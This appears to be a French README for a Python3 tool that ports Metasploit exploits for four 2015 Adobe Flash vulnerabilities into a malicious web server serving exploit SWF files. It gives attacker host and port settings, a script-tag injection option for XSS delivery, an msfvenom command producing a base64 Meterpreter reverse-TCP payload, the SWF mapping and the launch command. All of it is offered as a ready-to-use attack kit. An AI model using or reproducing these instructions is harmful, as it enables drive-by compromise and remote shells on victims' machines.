
Convertis des exploits Metasploit pour les vulnérabilités Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 et CVE-2015-5122 en script Python3.
Exploits Metasploit convertis pour les vulnérabilités Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 et CVE-2015-5122 en un script Python3.
Ce script hébergera un serveur web pouvant exploiter une des vulnérabilités Adobe Flash suivantes à la fois :
Vous devez apporter des modifications (décrites ici) à exploit.py pour l’adapter à vos besoins.
hostname = "192.168.1.100"
serverPort = 8080
xss = False
True, la première requête de la victime au serveur est traitée comme du JavaScript :
<script src="http://192.168.1.100:8080/"></script>False, la première requête de la victime au serveur est traitée comme du HTML :
http://192.168.1.100:8080/base64Payload = "..."
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64Note : La seule charge utile qui a fonctionné pour moi est
windows/meterpreter/reverse_tcp.
swfFile = swfFileList['37368']
swfFileList = {
'37368': 'CVE-2015-3090.swf',
'37448': 'CVE-2015-3105.swf',
'37523': 'CVE-2015-5119.swf',
'37599': 'CVE-2015-5122.swf'
}
Exécutez la commande suivante, dans le même répertoire que les fichiers swf malveillants, pour lancer le script d’exploitation Adobe Flash :
python3 exploit.pyCVE-2015-3090 -> https://exploit-db.com/exploits/37368
CVE-2015-3105 -> https://exploit-db.com/exploits/37448
CVE-2015-5119 -> https://exploit-db.com/exploits/37523
CVE-2015-5122 -> https://exploit-db.com/exploits/37599